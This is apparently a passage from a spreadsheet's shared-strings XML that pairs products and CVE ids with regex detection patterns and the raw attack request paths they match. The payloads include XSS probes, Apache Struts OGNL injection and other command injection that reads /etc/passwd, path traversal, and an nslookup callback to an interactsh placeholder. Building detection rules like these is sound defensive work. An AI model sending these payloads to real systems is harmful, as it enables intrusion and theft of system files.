    <t>RentEquip Multipurpose Rental</t>
  </si>
  <si>
    <t>.*?(?:/shop/products\?category=cordless-tools&amp;min=1026553%3balert\(document\.domain\)%2f%2f772).*</t>
  </si>
  <si>
    <t>/shop/products?category=cordless-tools&amp;min=1026553%3balert(document.domain)%2f%2f772</t>
  </si>
  <si>
    <t>Senayan Library Management System (SLIMS )</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&amp;destination=zbuip%22%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3Ejgoihbmmygljgoihbmmygl&amp;logMeIn=Login&amp;memberID=admin&amp;memberPassWord=password&amp;p=member).*</t>
  </si>
  <si>
    <t>/index.php?_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&amp;destination=zbuip%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ejgoihbmmygljgoihbmmygl&amp;logMeIn=Login&amp;memberID=admin&amp;memberPassWord=password&amp;p=member</t>
  </si>
  <si>
    <t>Tiki WikiCMS</t>
  </si>
  <si>
    <t>.*?(?:/tiki/tiki-ajax_services\.php\?controller=comment&amp;action=list&amp;type=wiki\+page&amp;objectId=&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;|/tiki-ajax_services\.php\?controller=comment&amp;action=list&amp;type=wiki\+page&amp;objectId=&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/tiki-ajax_services.php?controller=comment&amp;action=list&amp;type=wiki+page&amp;objectId=&lt;script&gt;alert(document.domain)&lt;/script&gt;|/tiki/tiki-ajax_services.php?controller=comment&amp;action=list&amp;type=wiki+page&amp;objectId=&lt;script&gt;alert(document.domain)&lt;/script&gt;</t>
  </si>
  <si>
    <t>VMware</t>
  </si>
  <si>
    <t>.*?(?:/login/\?redirectTo=/tenant/e&amp;service=&lt;/script&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/login/?redirectTo=/tenant/e&amp;service=&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</t>
  </si>
  <si>
    <t>Oracle Fusion Middleware WebCenter Sites</t>
  </si>
  <si>
    <t>CVE-2018-2791</t>
  </si>
  <si>
    <t>.*?(?:/cs/Satellite\?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&amp;cs_imagedir=qqq%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E|/cs/Satellite\?destpage="&lt;h1xxx"&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;&amp;pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError).*|.*?(?:/cs/Satellite\?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&amp;WemUI=qqq%27;\}%3C/script%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E|/cs/Satellite\?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&amp;WemUI=qqq%27;\}%3C/script%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E|/cs/Satellite\?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&amp;cs_imagedir=qqq"&gt;&lt;script&gt;alert\(document\.domain\)&lt;/script&gt;).*</t>
  </si>
  <si>
    <t>/cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&amp;cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E|/cs/Satellite?destpage="&lt;h1xxx"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&amp;pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError|/cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&amp;cs_imagedir=qqq"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;|/cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&amp;WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E|/cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&amp;WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>McAfee ePolicy Orchestrator</t>
  </si>
  <si>
    <t>CVE-2020-7318</t>
  </si>
  <si>
    <t>.*?(?:/PolicyMgmt/policyDetailsCard\.do\?poID=19&amp;typeID=3&amp;prodID=%27%22%3E%3Csvg%2fonload%3dalert\(document\.domain\)%3E).*</t>
  </si>
  <si>
    <t>/PolicyMgmt/policyDetailsCard.do?poID=19&amp;typeID=3&amp;prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E</t>
  </si>
  <si>
    <t>CVE-2020-29395</t>
  </si>
  <si>
    <t>.*?(?:/addons/\?q=%3Csvg%2Fonload%3Dalert\(1\)%3E).*</t>
  </si>
  <si>
    <t>/|/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E</t>
  </si>
  <si>
    <t>Aruba Instant Access Point (IAP)</t>
  </si>
  <si>
    <t>CVE-2021-25161</t>
  </si>
  <si>
    <t>.*?(?:/swarm\.cgi\?opcode=cp_preview&amp;bg_color=AA&amp;banner_color=B&amp;banner_text=AAA&amp;terms_of_use=AAA&amp;use_policy=BBB&amp;authenticated=False&amp;decoded_texts="%27;%0Aalert\(document\.domain\);//%0a%27).*</t>
  </si>
  <si>
    <t>/swarm.cgi?opcode=cp_preview&amp;bg_color=AA&amp;banner_color=B&amp;banner_text=AAA&amp;terms_of_use=AAA&amp;use_policy=BBB&amp;authenticated=False&amp;decoded_texts="%27;%0Aalert(document.domain);//%0a%27</t>
  </si>
  <si>
    <t>IRTS OP Monitor</t>
  </si>
  <si>
    <t>CVE-2021-40272</t>
  </si>
  <si>
    <t>.*?(?:/api/help'onmouseover=alert\(document\.domain\)/'/;/beta/license).*</t>
  </si>
  <si>
    <t>/api/help'onmouseover=alert(document.domain)/'/;/beta/license</t>
  </si>
  <si>
    <t>CVE-2021-24498</t>
  </si>
  <si>
    <t>.*?(?:/\?cpmvc_id=1&amp;cpmvc_do_action=mvparse&amp;f=edit&amp;month_index=0&amp;delete=1&amp;palette=0&amp;paletteDefault=F00&amp;calid=1&amp;id=999&amp;start=a%22%3E%3Csvg/%3E%3C%22&amp;end=a%22%3E%3Csvg/onload=alert\(1\)%3E%3C%22).*</t>
  </si>
  <si>
    <t>/?cpmvc_id=1&amp;cpmvc_do_action=mvparse&amp;f=edit&amp;month_index=0&amp;delete=1&amp;palette=0&amp;paletteDefault=F00&amp;calid=1&amp;id=999&amp;start=a%22%3E%3Csvg/%3E%3C%22&amp;end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22</t>
  </si>
  <si>
    <t>CVE-2021-24364</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?action=tie_get_user_weather&amp;options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D).*</t>
  </si>
  <si>
    <t>/|/wp-admin/admin-ajax.php?action=tie_get_user_weather&amp;options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D|/|/wp-admin/admin-ajax.php</t>
  </si>
  <si>
    <t>CVE-2021-24387</t>
  </si>
  <si>
    <t>.*?(?:/\?ct_mobile_keyword&amp;ct_keyword&amp;ct_city&amp;ct_zipcode&amp;search-listings=true&amp;ct_price_from&amp;ct_price_to&amp;ct_beds_plus&amp;ct_baths_plus&amp;ct_sqft_from&amp;ct_sqft_to&amp;ct_lotsize_from&amp;ct_lotsize_to&amp;ct_year_from&amp;ct_year_to&amp;ct_community=%3Cscript%3Ealert%28document\.domain%29%3B%3C%2Fscript%3E&amp;ct_mls&amp;ct_brokerage=0&amp;lat&amp;lng).*</t>
  </si>
  <si>
    <t>/?ct_mobile_keyword&amp;ct_keyword&amp;ct_city&amp;ct_zipcode&amp;search-listings=true&amp;ct_price_from&amp;ct_price_to&amp;ct_beds_plus&amp;ct_baths_plus&amp;ct_sqft_from&amp;ct_sqft_to&amp;ct_lotsize_from&amp;ct_lotsize_to&amp;ct_year_from&amp;ct_year_to&amp;ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&amp;ct_mls&amp;ct_brokerage=0&amp;lat&amp;lng</t>
  </si>
  <si>
    <t>CVE-2021-24274</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin\.php\?page=ultimate-maps-supsystic&amp;tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/|/wp-admin/admin.php?page=ultimate-maps-supsystic&amp;tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>npm ansi_up</t>
  </si>
  <si>
    <t>CVE-2021-3377</t>
  </si>
  <si>
    <t>.*?(?:/\\u001B\]8;;https://interact\.sh"/onmouseover="alert\(1\)\\u0007example\\u001B\]8;;\\u0007).*</t>
  </si>
  <si>
    <t>/\u001B]8;;https://interact.sh"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007</t>
  </si>
  <si>
    <t>SmarterTools SmarterTrack</t>
  </si>
  <si>
    <t>CVE-2022-24384</t>
  </si>
  <si>
    <t>.*?(?:/Main/Default\.aspx\?viewSurveyError=Unknown\+survey"&gt;&lt;img%20src=x%20onerror=alert\(document\.domain\)&gt;).*</t>
  </si>
  <si>
    <t>/Main/Default.aspx?viewSurveyError=Unknown+survey"&gt;&lt;img%20src=x%20onerror=alert(document.domain)&gt;</t>
  </si>
  <si>
    <t>CVE-2022-1906</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?action=dprv_log_event&amp;message=%3Cscript%3Ealert\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=dprv_log_event&amp;message=%3Cscript%3Ealert(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>CVE-2022-0234</t>
  </si>
  <si>
    <t>.*?(?:/wp-admin/admin-ajax\.php\?action=woocs_get_products_price_html&amp;woocs_in_order_currency=&lt;img%20src%20onerror=alert\(document\.domain\)&gt;).*</t>
  </si>
  <si>
    <t>/wp-admin/admin-ajax.php?action=woocs_get_products_price_html&amp;woocs_in_order_currency=&lt;img%20src%20onerror=alert(document.domain)&gt;</t>
  </si>
  <si>
    <t>CrafterCMS Engine</t>
  </si>
  <si>
    <t>CVE-2023-4136</t>
  </si>
  <si>
    <t>.*?(?:/api/1/site/url/transform\?transformerName=%3Cscript%20xmlns%3D%22http%3A//www\.w3\.org/1999/xhtml%22%3Ealert\(document\.domain\)%3C/script%3E&amp;url=|/api/1/site/content_store/children\?url=%3Cscript%20xmlns%3D%22http%3A//www\.w3\.org/1999/xhtml%22%3Ealert\(document\.domain\)%3C/script%3E|/api/1/site/content_store/item\?url=%3Cscript%20xmlns%3D%22http%3A//www\.w3\.org/1999/xhtml%22%3Ealert\(document\.domain\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/api/1/site/content_store/item?url=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E|/api/1/site/url/transform?transformerName=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E&amp;url=|/api/1/site/content_store/children?url=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E</t>
  </si>
  <si>
    <t>Emlog Pro</t>
  </si>
  <si>
    <t>CVE-2023-41621</t>
  </si>
  <si>
    <t>.*?(?:/admin/store\.php\?"onmouseover='alert\(document\.domain\)'bad=").*</t>
  </si>
  <si>
    <t>/admin/store.php?"onmouseover='alert(document.domain)'bad="</t>
  </si>
  <si>
    <t>FOSSBilling</t>
  </si>
  <si>
    <t>CVE-2023-3521</t>
  </si>
  <si>
    <t>.*?(?:/admin\?_url=%2Fadmin&amp;date_to='"&gt;&lt;img\+src=x\+onerror=alert\(3\)&gt;&amp;date_from='"&gt;&lt;img\+src=x\+onerror=alert\(3\)&gt;).*</t>
  </si>
  <si>
    <t>/admin?_url=%2Fadmin&amp;date_to='"&gt;&lt;img+src=x+onerror=alert(3)&gt;&amp;date_from='"&gt;&lt;img+src=x+onerror=alert(3)&gt;</t>
  </si>
  <si>
    <t>CVE-2023-39700</t>
  </si>
  <si>
    <t>.*?(?:/webmail/\?color=%22%3E%3Cimg%20src=x%20onerror=confirm\(document\.cookie\)%3E).*</t>
  </si>
  <si>
    <t>/webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E</t>
  </si>
  <si>
    <t>phpMyFAQ</t>
  </si>
  <si>
    <t>CVE-2023-5863</t>
  </si>
  <si>
    <t>.*?(?:/admin/index\.php\?action=ngductung"&gt;&lt;img\+src/onerror="alert\(document\.domain\)).*</t>
  </si>
  <si>
    <t>/admin/index.php?action=ngductung"&gt;&lt;img+src/onerror="alert(document.domain)</t>
  </si>
  <si>
    <t>CVE-2023-2309</t>
  </si>
  <si>
    <t>.*?(?:/community/main-forum/\?param=%3Cscript%3Ealert\(/document\.domain/\)%3C/script%3E).*</t>
  </si>
  <si>
    <t>/community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E</t>
  </si>
  <si>
    <t>Coda</t>
  </si>
  <si>
    <t>CVE-2024-28734</t>
  </si>
  <si>
    <t>.*?(?:/coda/frameset\?cols="&gt;&lt;frame%20src="javascript:alert\(document\.domain\)"&gt;).*</t>
  </si>
  <si>
    <t>/coda/frameset?cols="&gt;&lt;frame%20src="javascript:alert(document.domain)"&gt;</t>
  </si>
  <si>
    <t>Ganglia Web Interface</t>
  </si>
  <si>
    <t>CVE-2024-52762</t>
  </si>
  <si>
    <t>.*?(?:/ganglia/\?tz=%22%3E%3Cscript%3Ealert\(document\.domain\)%3C/script%3E).*|.*?(?:/ganglia/graph_all_periods\.php\?g=%22%22%20autofocus%20onfocus=alert\(document\.domain\)//%22).*</t>
  </si>
  <si>
    <t>/ganglia/?tz=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E|/ganglia/graph_all_periods.php?g=%22%22%20autofocus%20onfocus=alert(document.domain)//%22</t>
  </si>
  <si>
    <t>MailEnable Mail Service</t>
  </si>
  <si>
    <t>CVE-2025-44148</t>
  </si>
  <si>
    <t>.*?(?:/Mondo/lang/sys/Failure\.aspx\?state=19753%22;\}alert\(document\.domain\);function%20test\(\)\{%22).*</t>
  </si>
  <si>
    <t>/Mondo/lang/sys/Failure.aspx?state=19753%22;}alert(document.domain);function%20test(){%22</t>
  </si>
  <si>
    <t>GeoVision Geowebserver</t>
  </si>
  <si>
    <t>.*?(?:/Visitor/bin/WebStrings\.srf\?file=&amp;obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document\.domain%29%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/Visitor/bin/WebStrings.srf?file=&amp;obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Nginx</t>
  </si>
  <si>
    <t>.*?(?:/status%3E%3Cscript%3Ealert\(7331\)%3C%2Fscript%3E|/_404_%3E%3Cscript%3Ealert\(1337\)%3C%2Fscript%3E).*</t>
  </si>
  <si>
    <t>/status%3E%3Cscript%3Ealert(7331)%3C%2Fscript%3E|/_404_%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E</t>
  </si>
  <si>
    <t>Readymade Unilevel Ecommerce</t>
  </si>
  <si>
    <t>.*?(?:/product-details\.php\?id=1"&gt;&lt;img/src/onerror=\.1\|alert`.*?`\+class=.*?&gt;).*</t>
  </si>
  <si>
    <t>/product-details.php?id=1"&gt;&lt;img/src/onerror=.1|alert`{{num1}}`+class={{num1}}&gt;</t>
  </si>
  <si>
    <t>ThinkPHP</t>
  </si>
  <si>
    <t>远程代码执行</t>
  </si>
  <si>
    <t>CNVD-2022-86535</t>
  </si>
  <si>
    <t xml:space="preserve">.*?(?:/\?\+config-create\+/&amp;lang=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./usr/local/lib/php/pearcmd&amp;/safedog\(\)\+.*?\.log|/\?lang=\.\./\.\./\.\./\.\./\.\./usr/local/php/pearcmd </t>
  </si>
  <si>
    <t>/?lang=../../../../../usr/local/php/pearcmd|/|/?+config-create+/&amp;lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&amp;/safedog()+{{rand_base(10)}}.log</t>
  </si>
  <si>
    <t>ZeroShell</t>
  </si>
  <si>
    <t>CVE-2009-0545</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/kerbynet\?Section=NoAuthREQ&amp;Action=x509List&amp;type=\*%22;/root/kerbynet\.cgi/scripts/getkey%20\.\./\.\./\.\./etc/passwd;%22).*</t>
  </si>
  <si>
    <t>/cgi-bin/kerbynet?Section=NoAuthREQ&amp;Action=x509List&amp;type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22</t>
  </si>
  <si>
    <t>Apache</t>
  </si>
  <si>
    <t>CVE-2012-0392</t>
  </si>
  <si>
    <t>.*?(?:/devmode\.action\?debug=command&amp;expression=\(%23_memberAccess\[%22allowStaticMethodAccess%22\]%3Dtrue%2C%23foo%3Dnew%20java\.lang\.Boolean\(%22false%22\)%20%2C%23context\[%22xwork\.MethodAccessor\.denyMethodExecution%22\]%3D%23foo%2C@org\.apache\.commons\.io\.IOUtils@toString\(@java\.lang\.Runtime@getRuntime\(\)\.exec\(%27cat%20/etc/passwd%27\)\.getInputStream\(\)\)\)).*</t>
  </si>
  <si>
    <t>/devmode.action?debug=command&amp;expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))</t>
  </si>
  <si>
    <t>CVE-2016-3081</t>
  </si>
  <si>
    <t>.*?(?:/index\.action\?method:%23_memberAccess%3d@ognl\.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org\.apache\.struts2\.ServletActionContext%40getResponse\(\),%23res\.setCharacterEncoding\(%23parameters\.encoding%5B0%5D\),%23w%3d%23res\.getWriter\(\),%23s%3dnew\+java\.util\.Scanner\(@java\.lang\.Runtime@getRuntime\(\)\.exec\(%23parameters\.cmd%5B0%5D\)\.getInputStream\(\)\)\.useDelimiter\(%23parameters\.pp%5B0%5D\),%23str%3d%23s\.hasNext\(\)%3f%23s\.next\(\)%3a%23parameters\.ppp%5B0%5D,%23w\.print\(%23str\),%23w\.close\(\),1\?%23xx:%23request\.toString&amp;pp=%5C%5CA&amp;ppp=%20&amp;encoding=UTF-8&amp;cmd=cat%20/etc/passwd).*</t>
  </si>
  <si>
    <t>/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&amp;pp=%5C%5CA&amp;ppp=%20&amp;encoding=UTF-8&amp;cmd=cat%20/etc/passwd</t>
  </si>
  <si>
    <t>NETGEAR Routers</t>
  </si>
  <si>
    <t>CVE-2016-6277</t>
  </si>
  <si>
    <t>.*?(?:/cgi-bin/;cat\$IFS/etc/passwd).*</t>
  </si>
  <si>
    <t>/cgi-bin/;cat$IFS/etc/passwd</t>
  </si>
  <si>
    <t>CVE-2017-12611</t>
  </si>
  <si>
    <t>.*?(?:/\?name=%25%7B%28%23dm%3D%40ognl\.OgnlContext%40DEFAULT_MEMBER_ACCESS%29\.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com\.opensymphony\.xwork2\.ActionContext\.container%27%5D%29\.%28%23ognlUtil%3D%23container\.getInstance%28%40com\.opensymphony\.xwork2\.ognl\.OgnlUtil%40class%29%29\.%28%23ognlUtil\.getExcludedPackageNames%28%29\.clear%28%29%29\.%28%23ognlUtil\.getExcludedClasses%28%29\.clear%28%29%29\.%28%23context\.setMemberAccess%28%23dm%29%29%29%29\.%28%23cmd%3D%27cat%20/etc/passwd%27%29\.%28%23iswin%3D%28%40java\.lang\.System%40getProperty%28%27os\.name%27%29\.toLowerCase%28%29\.contains%28%27win%27%29%29%29\.%28%23cmds%3D%28%23iswin%3F%7B%27cmd\.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29\.%28%23p%3Dnew%20java\.lang\.ProcessBuilder%28%23cmds%29%29\.%28%23p\.redirectErrorStream%28true%29%29\.%28%23process%3D%23p\.start%28%29%29\.%28%40org\.apache\.commons\.io\.IOUtils%40toString%28%23process\.getInputStream%28%29%29%29%7D).*</t>
  </si>
  <si>
    <t>/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D\|/integration/saveGangster.action\|/orders/3|/struts2-rest-showcase/orders/3</t>
  </si>
  <si>
    <t>OpenDreambox</t>
  </si>
  <si>
    <t>CVE-2017-14135</t>
  </si>
  <si>
    <t>.*?(?:/webadmin/script\?command=\|%20nslookup%20.*?).*</t>
  </si>
  <si>
    <t>/webadmin/script?command=|%20nslookup%20{{interactsh-url}}</t>
  </si>
  <si>
    <t>Palo Alto Network PAN</t>
  </si>
  <si>
    <t>CVE-2017-15944</t>
  </si>
  <si>
    <t>.*?(?:/esp/cms_changeDeviceContext\.esp\?device=aaaaa:a%27";user\|s\."1337";).*</t>
  </si>
  <si>
    <t>/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";</t>
  </si>
  <si>
    <t>CVE-2018-11776</t>
  </si>
  <si>
    <t>.*?(?:/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java\.lang\.Runtime@getRuntime%28%29\.exec%28%27cat%20/etc/passwd%27%29\.getInputStream%28%29%2C%23b%3Dnew%20java\.io\.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java\.io\.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c\.read%28%23d%29%2C%23sbtest%3D@org\.apache\.struts2\.ServletActionContext@getResponse%28%29\.getWriter%28%29%2C%23sbtest\.println%28%23d%29%2C%23sbtest\.close%28%29%29%7D/actionChain1\.action).*</t>
  </si>
  <si>
    <t>/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action</t>
  </si>
  <si>
    <t>AudioCodes</t>
  </si>
  <si>
    <t>CVE-2018-10093</t>
  </si>
  <si>
    <t>.*?(?:/command\.cgi\?cat%20/etc/passwd).*</t>
  </si>
  <si>
    <t>/command.cgi?cat%20/etc/passwd</t>
  </si>
  <si>
    <t>CVE-2018-7700</t>
  </si>
  <si>
    <t>.*?(?:/tag_test_action\.php\?url=a&amp;token=&amp;partcode=\{dede:field%20name=%27source%27%20runphp=%27yes%27\}echo%20md5%28%22CVE-2018-7700%22%29%3B\{/dede:field\}).*</t>
  </si>
  <si>
    <t>/tag_test_action.php?url=a&amp;token=&amp;partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}</t>
  </si>
  <si>
    <t>FUELCMS</t>
  </si>
  <si>
    <t>CVE-2018-16763</t>
  </si>
  <si>
    <t>.*?(?:/fuel/pages/select/\?filter=%27%2bpi\(print\(%24a%3d%27system%27\)\)%2b%24a\(%27cat%20/etc/passwd%27\)%2b%27).*</t>
  </si>
  <si>
    <t>/fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27</t>
  </si>
  <si>
    <t>Nuxeo</t>
  </si>
  <si>
    <t>CVE-2018-16341</t>
  </si>
  <si>
    <t>.*?(?:/nuxeo/login\.jsp/pwn\$\{31333333330\+7\}\.xhtml).*</t>
  </si>
  <si>
    <t>/nuxeo/login.jsp/pwn${31333333330+7}.xhtml</t>
  </si>
  <si>
    <t>CVE-2018-8823</t>
  </si>
  <si>
    <t>.*?(?:/modules/bamegamenu/ajax_phpcode\.php\?code=print\(md5\(.*?\)\)).*</t>
  </si>
  <si>
    <t>/modules/bamegamenu/ajax_phpcode.php?code=print(md5({{num}}))</t>
  </si>
  <si>
    <t>CVE-2018-20062</t>
  </si>
  <si>
    <t>.*?(?:\?s=index/thinkapp/invokefunction&amp;function=call_user_func_array&amp;vars\[0\]=phpinfo&amp;vars\[1\]\[\]=1).*</t>
  </si>
  <si>
    <t>?s=index/think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=phpinfo&amp;vars[1][]=1</t>
  </si>
  <si>
    <t>KenticoCMS</t>
  </si>
  <si>
    <t>CVE-2019-10068</t>
  </si>
  <si>
    <t>.*?(?:/CMSPages/Staging/SyncServer\.asmx/ProcessSynchronizationTaskData).*</t>
  </si>
  <si>
    <t>/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData</t>
  </si>
  <si>
    <t>CVE-2020-17530</t>
  </si>
  <si>
    <t>.*?(?:/\?id=%25%7B%28%23instancemanager%3D%23application%5B%22org\.apache\.tomcat\.InstanceManager%22%5D%29\.%28%23stack%3D%23attr%5B%22com\.opensymphony\.xwork2\.util\.ValueStack\.ValueStack%22%5D%29\.%28%23bean%3D%23instancemanager\.newInstance%28%22org\.apache\.commons\.collections\.BeanMap%22%29%29\.%28%23bean\.setBean%28%23stack%29%29\.%28%23context%3D%23bean\.get%28%22context%22%29%29\.%28%23bean\.setBean%28%23context%29%29\.%28%23macc%3D%23bean\.get%28%22memberAccess%22%29%29\.%28%23bean\.setBean%28%23macc%29%29\.%28%23emptyset%3D%23instancemanager\.newInstance%28%22java\.util\.HashSet%22%29%29\.%28%23bean\.put%28%22excludedClasses%22%2C%23emptyset%29%29\.%28%23bean\.put%28%22excludedPackageNames%22%2C%23emptyset%29%29\.%28%23arglist%3D%23instancemanager\.newInstance%28%22java\.util\.ArrayList%22%29%29\.%28%23arglist\.add%28%22cat\+%2Fetc%2Fpasswd%22%29%29\.%28%23execute%3D%23instancemanager\.newInstance%28%22freemarker\.template\.utility\.Execute%22%29%29\.%28%23execute\.exec%28%23arglist%29%29%7D).*</t>
  </si>
  <si>
